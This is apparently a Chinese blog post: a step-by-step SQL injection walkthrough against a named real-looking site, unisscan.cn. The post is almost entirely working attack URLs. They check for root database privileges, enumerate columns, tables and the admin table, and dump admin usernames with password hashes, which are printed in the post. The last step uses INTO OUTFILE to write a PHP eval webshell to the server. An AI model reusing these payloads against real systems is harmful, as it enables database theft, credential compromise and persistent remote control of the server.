1、识别是否和root数据库直链

and ord(mid(user(),1,1))=114 #若返回正常则是root权限,返回报错不是root权限。
列如:

http://unisscan.cn/list.php?lei=246 and ord(mid(user(),1,1))=114 #返回正常
2、猜字段

http://unisscan.cn/list.php?lei=246 order by 31--
3、暴字段位置

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31-- #字段分别是2和8
4、收集信息

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31--
root@localhost:uniscan:5.6.15
5、爆uniscan库

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31 from information_schema.tables where table_schema=database() --
表名:admin,admin_log,attrs,attrs_bak,info,my_ad,news,news_lx,news_sort,re_thing,shuju,shuju_xx,signup,szsheng,szshi,topics,user_level,wangdian,yujing
6、获取admin里面的全部列

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,concat(group_concat(distinct+column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=0x61646D696E--
列:id,username,password,quanxian,zhiwei,quanxian1,biming,easyset,lx,chat
7、最后一步爆数据

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from uniscan.admin--
账号密码:admin:74d1a2ceca6456a14b3a3ecfa0e499ff,service:559ff8dd58c16ddcac08ffcf0a56a449
8、利用dba权限直接写一句话木马

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,%27%3C?php%20eval($_POST[cmd])?%3E%27,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20into%20outfile%20%27V:\web\php\php5\PHP_Web\phpstat3.2\one.php%27
路径可以通过phpinfo.php配置文件等寻找。

0

正因为生来什么都没有,因此我们能拥有一切。